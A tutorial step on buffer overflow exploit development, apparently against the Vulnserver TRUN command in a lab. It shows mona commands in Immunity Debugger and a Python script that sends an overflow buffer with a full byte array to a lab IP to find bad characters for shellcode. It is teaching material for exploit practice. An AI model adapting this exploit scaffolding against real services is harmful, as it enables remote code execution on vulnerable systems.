Finding Bad Characters: When generating shell code, we need to know what characters are good for the shellcode and what characters are bad for the shellcode.
We can do that by running all the hex characters through our program and seeing if any of them act up. By default, the null byte act x\00 acts up.
For example, \x70 bad character, it maybe some command that runs in the program that tell you to do something. So, we don't want to use \x70 in our generating of shellcode because then the shellcode is going to break if it uses the \x70.
Let create folder in drive C:\mona. Go to immunity Debugger and type
!mona config -set workingfolder c:\mona
To generate the bad characters #exclude \x00
!mona bytearray -cpb "\x00"
Otherwise, you can go to mona directory, there will be an output of bad characters file.
4-badchars.py
//python3 4-badchars.py
#!/usr/bin/python3
import sys, socket
from time import sleep
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
shellcode = "A" * 2003 + "B" * 4 + badchars
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
//Change This IP address and Port
s.connect(('192.168.30.131',9999))
payload = "TRUN /.:/" + shellcode
s.send((payload.encode()))
s.close()
except:
print ("Error connecting to server")
sys.exit()
Once we have executed the script, we can compare the bad characters, we can use mona module.
!mona compare -f c:\mona\bytearray.bin -a 00F6F9D8 > Enter
We can see that the result show bad chars 00 and 80.
Note everything show here are all bad characters. You need to remove it one by one.
Then, try to remove \x00 that bad character from the shellcode, and try to send the shellcode once again. You could see in Filed Badchars is blank.
